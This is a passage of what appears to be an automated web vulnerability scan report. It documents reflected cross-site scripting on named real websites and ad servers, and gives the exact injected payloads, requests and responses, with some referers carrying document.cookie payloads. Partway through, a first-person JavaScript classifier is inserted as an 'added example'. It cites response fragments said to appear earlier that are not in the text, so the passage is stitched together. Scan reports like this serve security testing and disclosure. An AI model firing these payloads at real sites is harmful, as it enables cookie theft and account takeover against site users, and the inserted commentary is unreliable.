Date: Wed, 19 Jan 2011 18:09:18 GMT
Server: TornadoServer/1.0
Content-Length: 2205
Connection: Close
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 10337<script>alert(1)</script>88629374d28 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1295452261577&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6743622525202572&slotname=728x90A_General10337<script>alert(1)</script>88629374d28&page_slots=728x90A_General&cookie_enabled=1&ga_vid=1376446855.1295452262&ga_sid=1295452262&ga_hid=2080119672&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&lmt=1295473836&dt=1295452261654&cc=10&biw=950&bih=1012&ifi=1&adk=3889316276&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 19 Jan 2011 18:03:28 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2750

GA_googleSetAdContentsBySlotForSync({"728x90A_General10337<script>alert(1)</script>88629374d28":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...
4.44. http://rafael.adm.br/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://rafael.adm.br
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb7d"><script>alert(1)</script>21b58676d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffb7d\\\"><script>alert(1)</script>21b58676d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ffb7d"><script>alert(1)</script>21b58676d82=1 HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 16:58:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Cookie
X-Pingback: http://rafael.adm.br/xmlrpc.php
Content-Length: 43014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="http://rafael.adm.br/page/2/?ffb7d\\\"><script>alert(1)</script>21b58676d82=1">
...[SNIP]...
4.45. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /fca/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
4.46. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /hc/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
4.47. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
4.48. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the username request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe165'%3balert(1)//8402f0b736c was submitted in the username parameter. This input was echoed as fe165';alert(1)//8402f0b736c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/?username=rafaelpfe165'%3balert(1)//8402f0b736c HTTP/1.1
Host: twittercounter.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:03:39 GMT
Server: Apache/2.2.14 (Fedora) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Sat, 29 Jan 2011 18:03:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 448

<!-- document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/rafaelpfe165';alert(1)//8402f0b736c" title="TwitterCounter for @rafaelpfe165';alert(1)//8402f0b736c" target="_blank">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f21b'%3b3d19e4067f1 was submitted in the REST URL parameter 4. This input was echoed as 7f21b';3d19e4067f1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /284152846/direct7f21b'%3b3d19e4067f1/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic? HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6714
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:59 GMT
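The scanner's wording throughout this report ("copied into a JavaScript string which is encapsulated in single quotation marks", "echoed unmodified", "echoed as ...\"...") comes from locating the random canary around the payload in the response and inspecting the syntax on either side of it. The REST URL parameter 4 finding just above is the case where the string is confirmed closed but no complete proof of concept could be derived automatically, which is why it defers to manual examination: whether the bytes after the closing quote can be turned into running code is the part a human still has to work out. The following JavaScript is an added example, not part of the report: a minimal classifier of that kind, run over response fragments quoted earlier on this page. The function names are mine, and the script body used for the partial case is constructed, since the report snips that response.

```javascript
// Added example: a reflection-context classifier in the spirit of the scanner's
// "copied into ..." sentences. Not from the report.

// Walk JS source from a given string state. Returns the state at the end
// (null, "'", '"' or "`") and whether a string was closed along the way.
function jsStringState(code, initial = null) {
  let quote = initial, everClosed = false;
  for (let i = 0; i < code.length; i++) {
    const c = code[i];
    if (quote) {
      if (c === "\\") i++;                                   // escaped character: skip it
      else if (c === quote) { quote = null; everClosed = true; }
    } else if (c === "'" || c === '"' || c === "`") {
      quote = c;
    }
  }
  return { quote, everClosed };
}

// HTML side: are we inside a tag, and inside a quoted attribute value?
function htmlState(markup) {
  const lt = markup.lastIndexOf("<"), gt = markup.lastIndexOf(">");
  if (lt === -1 || gt > lt) return { inTag: false, quote: null };
  let quote = null;
  for (const c of markup.slice(lt)) {
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
  }
  return { inTag: true, quote };
}

function classifyReflection(body, contentType, prefix, suffix) {
  const start = body.indexOf(prefix);
  if (start === -1) return { reflected: false };
  const end = body.indexOf(suffix, start + prefix.length);
  if (end === -1) return { reflected: true, context: "unknown (suffix not found)" };
  const echoed = body.slice(start + prefix.length, end);
  const before = body.slice(0, start);

  // Enclosing script: the whole response when it is served as JavaScript,
  // otherwise the last unclosed <script ...> before the reflection point.
  let scriptStart = -1;
  if (/javascript/i.test(contentType)) scriptStart = 0;
  else {
    const lower = before.toLowerCase();
    const open = lower.lastIndexOf("<script");
    if (open > lower.lastIndexOf("</script")) {
      const gt = before.indexOf(">", open);
      if (gt !== -1) scriptStart = gt + 1;   // else we are still inside the <script ...> tag itself
    }
  }

  let context, breakoutPossible;
  if (scriptStart !== -1) {
    const { quote } = jsStringState(before.slice(scriptStart));
    if (quote) {
      context = `JavaScript string (${quote === "'" ? "single" : "double"}-quoted)`;
      // An unescaped matching quote in the echoed data ends the literal;
      // a backslash-escaped one (\' or \") does not, unlike in HTML.
      breakoutPossible = jsStringState(echoed, quote).everClosed;
    } else {
      context = "JavaScript code";
      breakoutPossible = true;
    }
  } else {
    const st = htmlState(before);
    if (st.inTag && st.quote) {
      context = `HTML attribute value (${st.quote === '"' ? "double" : "single"}-quoted)`;
      breakoutPossible = echoed.includes(st.quote);   // backslashes mean nothing to the HTML parser
    } else if (st.inTag) {
      context = "HTML tag (unquoted attribute)";
      breakoutPossible = /[\s>]/.test(echoed);
    } else {
      context = "HTML text between tags";
      breakoutPossible = echoed.includes("<");
    }
  }
  return { reflected: true, context, echoed, breakoutPossible };
}

// Response fragments taken from the report (trimmed to the reflection), plus a
// constructed script body for the partial REST URL parameter 4 finding, whose
// response body the report snips; that script is an assumption, not the site's markup.
const SAMPLES = {
  wordpressAttr: {
    body: '<form action="/?utm_campaign=blogwatchaff57\\"><script>alert(1)</script>29569e332da#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">',
    contentType: "text/html; charset=UTF-8", prefix: "aff57", suffix: "29569e332da",
  },
  sitescoutJs: {
    body: 'var pUrl = "http://guru.sitescout.com/disp?pid=94699B691eec";alert(1)//b86b5220098&rand=" + myRand;',
    contentType: "application/x-javascript", prefix: "91eec", suffix: "b86b5220098",
  },
  flowplayerAttr: {
    body: '<body id="tools3018b"><img src=a onerror=alert(1)>23dd898c372" class="msie tools">',
    contentType: "text/html;charset=ISO-8859-1", prefix: "3018b", suffix: "23dd898c372",
  },
  partialJs: {
    body: "<html><script>var path = '/284152846/direct7f21b';3d19e4067f1/01';</script></html>",
    contentType: "text/html", prefix: "7f21b", suffix: "3d19e4067f1",
  },
};

function classifyAll() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) {
    out[name] = classifyReflection(s.body, s.contentType, s.prefix, s.suffix);
  }
  return out;
}
```

`classifyAll()` reproduces the report's classifications for the four samples (double-quoted attribute for the WordPress and flowplayer fragments, double-quoted JavaScript string for the sitescout script, single-quoted JavaScript string for the constructed partial case) and flags the breakout as possible in all four. The same bytes are judged differently per context: `\"` closes nothing in a JavaScript string but does end an HTML attribute, which is exactly the distinction the backslash-escaping WordPress responses get wrong. A real scanner would also try payload variants in the flagged context and confirm execution; this block stops at the classification.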
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83606"-alert(1)-"a5366a597f2 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?83606"-alert(1)-"a5366a597f2 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6692
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:39 GMT
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b235"><script>alert(1)</script>4441186ab6f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?5b235"><script>alert(1)</script>4441186ab6f HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6767
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:39 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b22'-alert(1)-'7388b2ddfcf was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?c0b22'-alert(1)-'7388b2ddfcf HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6692
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:40 GMT
4.54. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://REDACTED
Path: /284152846/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecb45'-alert(1)-'36c4d6a038a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&ecb45'-alert(1)-'36c4d6a038a=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6707
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:45 GMT
4.55. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://REDACTED
Path: /284152846/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f836"><script>alert(1)</script>c59229a215b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&4f836"><script>alert(1)</script>c59229a215b=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6782
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:44 GMT
4.56. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://REDACTED
Path: /284152846/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14fa6"-alert(1)-"b006579a593 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&14fa6"-alert(1)-"b006579a593=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6707
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:44 GMT
The value of the dn request parameter is copied into a JavaScript inline comment. The payload e35b9*/alert(1)//6ec7245ba5b was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=e35b9*/alert(1)//6ec7245ba5b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the dn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37b7"%3balert(1)//97f91a6f73c was submitted in the dn parameter. This input was echoed as f37b7";alert(1)//97f91a6f73c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=f37b7"%3balert(1)//97f91a6f73c HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the dn request parameter is copied into the HTML document as text between TITLE tags. The payload 6c6ee</title><script>alert(1)</script>4caa1df9615 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=6c6ee</title><script>alert(1)</script>4caa1df9615 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload 778ef<script>alert(1)</script>584f04eb84a was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=778ef<script>alert(1)</script>584f04eb84a HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eec5"><script>alert(1)</script>da4345821a9 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=9eec5"><script>alert(1)</script>da4345821a9 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/java ...[SNIP]... <meta name="description" content="Look no further for the best information on 9eec5"><script>alert(1)</script>da4345821a9.9eec5"> ...[SNIP]...
The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c682d'><script>alert(1)</script>0eba87e9935 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=c682d'><script>alert(1)</script>0eba87e9935 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the dn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58025'%3balert(1)//1b423bdb38b was submitted in the dn parameter. This input was echoed as 58025';alert(1)//1b423bdb38b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=58025'%3balert(1)//1b423bdb38b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ce31'%3balert(1)//60c9f7c43e2 was submitted in the qkwid1 parameter. This input was echoed as 9ce31';alert(1)//60c9f7c43e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw9ce31'%3balert(1)//60c9f7c43e2&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
